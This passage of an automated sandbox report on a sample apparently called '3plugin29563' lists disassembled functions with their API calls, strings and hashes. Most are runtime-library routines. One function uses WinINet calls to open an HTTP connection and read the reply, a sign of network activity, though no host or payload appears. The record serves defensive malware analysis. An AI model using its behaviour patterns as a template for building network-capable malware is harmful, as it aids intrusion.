type_info::operator==.LIBVCRUNTIME ref: 021455CE
___TypeMatch.LIBVCRUNTIME ref: 021456DA
CatchIt.LIBVCRUNTIME ref: 0214572F
IsInExceptionSpec.LIBVCRUNTIME ref: 021457B5
_UnwindNestedFrames.LIBCMT ref: 0214583C
CallUnexpected.LIBVCRUNTIME ref: 02145857

Strings

csm, xrefs: 02145605
csm, xrefs: 021454E7
csm, xrefs: 02145554

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 8e3e93dc056ab8fd5de83e8c65849bf1026f44a4fd8d946d8d6c1e4fea1a4fc4
Instruction ID: 420dad71a09962d37d2c1861345c348dc4e9bff813673b8cbad8c43977156032
Opcode Fuzzy Hash: 8e3e93dc056ab8fd5de83e8c65849bf1026f44a4fd8d946d8d6c1e4fea1a4fc4
Instruction Fuzzy Hash: F2C18E71880209FFCF25DFA4C880AAEBBB7BF24315F94416AE8196B202DB31D551CF91

Function 0043290D Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0043291F

Part of subcall function 0043247E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004324A1

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432940
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0043294D
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043299B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432A43
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432A75

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction ID: 899863d1ed2fcdcb937afacb890ff96b2e6b6cd524c2a7fd7d5e0d5508c61657
Opcode Fuzzy Hash: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction Fuzzy Hash: 5771AF70A00209AFDF15DF54CA81BBFBBB1AF49304F04509AEC506B352C7BA9D16DB69

Function 02142B74 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 02142B86

Part of subcall function 021426E5: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 02142708

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 02142BA7
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 02142BB4
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 02142C02
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 02142CAA
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 02142CDC

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction ID: ac83b0a4b4413487f2fb71b2b5c353bcd42fd9a6c6fc39036cf87dcfbb09d9bd
Opcode Fuzzy Hash: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction Fuzzy Hash: 9E71D030940249AFDF16DF64C980BBEBBB2AF45344F044099FC59AB251CF72D996CB61

Function 0213EC30 Relevance: 16.6, APIs: 11, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0213EC80

Part of subcall function 02139136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 02139157

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0213EC99
Concurrency::location::_Assign.LIBCMT ref: 0213ECAF
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0213ED1C
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0213ED24
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0213ED4B
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0213ED57
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0213ED8F
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0213EDAE
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0213EDBC
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0213EDE3

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 3608406545-0
Opcode ID: 7149dbd63549f7799fb9a10f107c66b60902d38dea3d70be5e00c77da91dc22e
Instruction ID: d1f43cdc158efde77d683aa18a02fdc44938184c4c5c7fa50ec55691f89b62e7
Opcode Fuzzy Hash: 7149dbd63549f7799fb9a10f107c66b60902d38dea3d70be5e00c77da91dc22e
Instruction Fuzzy Hash: 4A5180747403049FDB16EF24C884BAD77A7BF89311F1900A9ED4A9B386CB70A905CFA1

Function 0042697A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004269BF
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 004269F1
List.LIBCONCRT ref: 00426A2C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A3D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A59
List.LIBCONCRT ref: 00426A94
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426AA5
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426AC0
List.LIBCONCRT ref: 00426AFB
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B08

Part of subcall function 00425E7F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425E97
Part of subcall function 00425E7F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EA9

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 6c5ec0742fdc78930775633eb6d6f08c57438a61e6ef12edbc35cd481a970cea
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 8B518371B00229AFDB04DF55D495BEEB3A8FF08304F4540AEE915A7381DB38AE45CB94

Function 02136BE1 Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 02136C26
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 02136C58
List.LIBCONCRT ref: 02136C93
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 02136CA4
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 02136CC0
List.LIBCONCRT ref: 02136CFB
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 02136D0C
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02136D27
List.LIBCONCRT ref: 02136D62
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 02136D6F

Part of subcall function 021360E6: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021360FE
Part of subcall function 021360E6: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 02136110

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 1a470af567dafc812d11890263694d9461a2aa9541795a53772c1cd2bb1d1e05
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 86516970A40219BFDB09DF64C494BEDB3BAFF08744F4540A9E905AB281DB34AE05CFA4

Function 0043A489 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A49F

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,?,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 0043A4AB
_free.LIBCMT ref: 0043A4B6
_free.LIBCMT ref: 0043A4C1
_free.LIBCMT ref: 0043A4CC
_free.LIBCMT ref: 0043A4D7
_free.LIBCMT ref: 0043A4E2
_free.LIBCMT ref: 0043A4ED
_free.LIBCMT ref: 0043A4F8
_free.LIBCMT ref: 0043A506

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: accde1620b69e7dc5d30b098583bcb7cc94c6da36c52d76ac73272e79f6d2f6e
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: 9D21077694010CBFCB01EFA5D881CDE7BB9BF08349F00A0AAF5459B521DB39EA54CB85

Function 0214A6F0 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214A706

Part of subcall function 0214AF8C: HeapFree.KERNEL32(00000000,00000000,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?), ref: 0214AFA2
Part of subcall function 0214AF8C: GetLastError.KERNEL32(?,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?,?), ref: 0214AFB4

_free.LIBCMT ref: 0214A712
_free.LIBCMT ref: 0214A71D
_free.LIBCMT ref: 0214A728
_free.LIBCMT ref: 0214A733
_free.LIBCMT ref: 0214A73E
_free.LIBCMT ref: 0214A749
_free.LIBCMT ref: 0214A754
_free.LIBCMT ref: 0214A75F
_free.LIBCMT ref: 0214A76D

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: 53d3385682ef42ef6f152cf4bef3b3cdbe02a559a79acadeb8537e5dfa4a07c7
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: 18217BB6980118BFCB41EF94C890DDE7BB9BF08340F01456AF5199B161EB35EA59CF84

Function 004459B3 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447B3F), ref: 004459CC

Strings

sqrt, xrefs: 00445B0B
pow, xrefs: 00445A6A, 00445B14, 00445B61
log10, xrefs: 00445A0E, 00445A1D
exp, xrefs: 00445A4B, 00445AB0
log, xrefs: 00445A29, 00445A38
acos, xrefs: 00445B02
asin, xrefs: 00445AF9

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 752ec507022053c254732ae66e5b127fe0b19707d769c8b4eb712e0ffa726ea9
Instruction ID: bc85813c17135a0872af1142ccedd968bed46637b6acdc18033fd067ebbac418
Opcode Fuzzy Hash: 752ec507022053c254732ae66e5b127fe0b19707d769c8b4eb712e0ffa726ea9
Instruction Fuzzy Hash: 0E518D70904E0ACBEF109F58E8881AE7F70FB05305F148157D881A6356CB7C9959CF5D

Function 00427304 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00427350
SwitchToThread.KERNEL32(?), ref: 00427373
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00427392
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 004273AE
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 004273B9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004273E0

Strings

count, xrefs: 0042731E
ppVirtualProcessorRoots, xrefs: 004273D8

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: c9bcc653dc57cc8557a221489ebf6a882272b6724b07de11919b806ce84109fb
Instruction ID: c2a622208c933c1fcc3b2d69174f2e12016109848744e637f30d368275880ee3
Opcode Fuzzy Hash: c9bcc653dc57cc8557a221489ebf6a882272b6724b07de11919b806ce84109fb
Instruction Fuzzy Hash: 78218134B00319AFCB10EF55D585AAE77B5BF09304F5040AAEC01A7352DB38AE41DB98

Function 00426DBC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00426DD6
GetCurrentProcess.KERNEL32 ref: 00426DDE
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426DF3
SafeRWList.LIBCONCRT ref: 00426E13

Part of subcall function 00424E0E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424E1F
Part of subcall function 00424E0E: List.LIBCMT ref: 00424E29

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426E25
GetLastError.KERNEL32 ref: 00426E34
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426E4A

Strings

eventObject, xrefs: 00426E1D

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: a81dbef5b56ab3bc5dc981e20fc4851be50d5c1d27b0270279f8c7e6fa25552b
Instruction ID: fbd56cad0209ac155177daed537dfb3bb272621399096d891ad52bb3a70f5664
Opcode Fuzzy Hash: a81dbef5b56ab3bc5dc981e20fc4851be50d5c1d27b0270279f8c7e6fa25552b
Instruction Fuzzy Hash: 90113675600214EBDB14EBA0EC8AFEF3368AB04306F61416BB405A20D2DB38DA04CA6D

Function 0040BCF2 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00458DD8,00000000,00000000,00000000,00000000), ref: 0040BD2C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BD50
HttpOpenRequestA.WININET(?,00000000), ref: 0040BD9A
HttpSendRequestA.WININET(?,00000000), ref: 0040BE5A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0040BF0C
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040BFC0
InternetCloseHandle.WININET(?), ref: 0040BFE7
InternetCloseHandle.WININET(?), ref: 0040BFEF
InternetCloseHandle.WININET(?), ref: 0040BFF7

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: edd13f963311835de36904ec66d95deb1f74885b5c0d3d9a55e891fb03538776
Instruction ID: 521afc023e55c771a02013cfbcb1282343f001cfa0e1b71c83ac7a4950f93beb
Opcode Fuzzy Hash: edd13f963311835de36904ec66d95deb1f74885b5c0d3d9a55e891fb03538776
Instruction Fuzzy Hash: 54C1C4B16001189BEB24DF28CD887DD7B75EF45304F5082AAF508A72D2D7799AC4CF99

Function 00445603 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da50fe00c732b4ae37190dc2fdf082dd6f1081c8479b63f71d3ca4b37ed86d37
Instruction ID: 35444341e376205d60da414917ba3b3272758ab73eaa794fd1994a480eb6ec9c
Opcode Fuzzy Hash: da50fe00c732b4ae37190dc2fdf082dd6f1081c8479b63f71d3ca4b37ed86d37
Instruction Fuzzy Hash: DAC1F4B0E08649DFEF15DF99C880BAE7BB0AF49314F04406AE445AB393D7789941CF69

Function 0215586A Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da50fe00c732b4ae37190dc2fdf082dd6f1081c8479b63f71d3ca4b37ed86d37
Instruction ID: 92f7cf5554b5995e78935cf7c29ff7e29c36cf6f4ba26ce4c774af632fde9474
Opcode Fuzzy Hash: da50fe00c732b4ae37190dc2fdf082dd6f1081c8479b63f71d3ca4b37ed86d37
Instruction Fuzzy Hash: EEC123B0984255EFCF25DFA8C884BADBBB3BF09314F4541A8E825AB391D7709941CF61

Function 0042E9C9 Relevance: 13.6, APIs: 9, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EA19

Part of subcall function 00428ECF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428EF0

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0042EA32
Concurrency::location::_Assign.LIBCMT ref: 0042EA48
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0042EAB5
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0042EABD
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EAE4
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0042EAF0
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042EB47
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0042EB7C

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::$Processor::QuickVirtual$ClearCountedEventInterlockedReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSchedulerSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 1448206229-0
Opcode ID: 7149dbd63549f7799fb9a10f107c66b60902d38dea3d70be5e00c77da91dc22e
Instruction ID: d91d65f3a60442550caba139df0f2a7b50490623c49e926295c47f32d19e7350
Opcode Fuzzy Hash: 7149dbd63549f7799fb9a10f107c66b60902d38dea3d70be5e00c77da91dc22e
Instruction Fuzzy Hash: 0851A3347002249FCB04EF25D4D5BAD7765BF49315F9840AAED469B387CB78AC01CBAA

Function 0212C659 Relevance: 13.6, APIs: 9, Instructions: 138threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0212C681
GetCurrentThreadId.KERNEL32 ref: 0212C69E
GetCurrentThreadId.KERNEL32 ref: 0212C6B3
_xtime_get.LIBCPMT ref: 0212C6FF
GetCurrentThreadId.KERNEL32 ref: 0212C731
__Xtime_diff_to_millis2.LIBCPMT ref: 0212C749
_xtime_get.LIBCPMT ref: 0212C768
GetCurrentThreadId.KERNEL32 ref: 0212C772
GetCurrentThreadId.KERNEL32 ref: 0212C7C9

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction ID: 292336afc18871bc98aa59d9fa195034abef87e6dfc9f3bc1b2963f95dc16bd7
Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction Fuzzy Hash: F4518D35940226CFCF14DF64C9849AD77B1BF08315B2280AAFA069B261DB30ED99CFD5

Function 00427881 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 004278A3

Part of subcall function 00425C58: __EH_prolog3_catch.LIBCMT ref: 00425C5F
Part of subcall function 00425C58: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425C98

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 004278B1

Part of subcall function 004268BD: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 004268E2
Part of subcall function 004268BD: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426905

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004278CA
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 004278D6

Part of subcall function 00425C58: InterlockedPopEntrySList.KERNEL32(?), ref: 00425CE1
Part of subcall function 00425C58: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D10
Part of subcall function 00425C58: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D1E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427922
Concurrency::location::_Assign.LIBCMT ref: 00427943
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 0042794B
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042795D
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 0042798D

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: f575f15970d35d67521e6d84ff8bd540699cd5962be375f660d3662df2be63d1
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: E5312630B083716BEF16AA7864527FFBBA55F41304F4441ABD445D7242E73D4C8AC799

Function 02137AE8 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 02137B0A

Part of subcall function 02135EBF: __EH_prolog3_catch.LIBCMT ref: 02135EC6
Part of subcall function 02135EBF: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02135EFF

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 02137B18

Part of subcall function 02136B24: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 02136B49
Part of subcall function 02136B24: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 02136B6C

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 02137B31
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 02137B3D

Part of subcall function 02135EBF: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02135F48
Part of subcall function 02135EBF: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 02135F77
